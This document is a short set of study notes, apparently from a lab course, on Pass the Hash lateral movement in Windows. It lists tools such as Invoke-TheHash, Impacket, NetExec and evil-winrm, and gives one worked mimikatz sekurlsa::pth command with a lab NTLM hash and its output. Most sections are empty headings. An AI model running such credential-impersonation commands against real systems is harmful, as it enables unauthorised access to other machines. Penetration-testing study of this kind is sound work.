Windows Lateral Movement Techniques
Pass the Hash (PtH) - Teorie
Pass the Hash with Mimikatz (Windows)
Pass the Hash from Windows Using Mimikatz
c:\tools> mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit
user : julio
domain : inlanefreight.htb
program : cmd.exe
impers. : no
NTLM : 64F12CDDAA88057E06A81B54E73B949B
| PID 8404
| TID 4268
| LSA Process was already R/W
| LUID 0 ; 5218172 (00000000:004f9f7c)
\_ msv1_0 - data copy @ 0000028FC91AB510 : OK !
\_ kerberos - data copy @ 0000028FC964F288
\_ des_cbc_md4 -> null
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ des_cbc_md4 OK
\_ *Password replace @ 0000028FC9673AE8 (32) -> null
Pass the Hash with PowerShell Invoke-TheHash (Windows)
Invoke-TheHash with SMB
Netcat listener

Invoke-TheHash with WMI

Pass the Hash with Impacket (Linux)
Pass the Hash with Impacket PsExec
Pass the Hash with NetExec (Linux)
NetExec - Command Execution
Pass the Hash with evil-winrm (Linux)
Pass the Hash with evil-winrm
Pass the Hash with RDP (Linux)

Enable Restricted Admin Mode to allow PtH

Pass the Hash using RDP

Lab - Questions







Last updated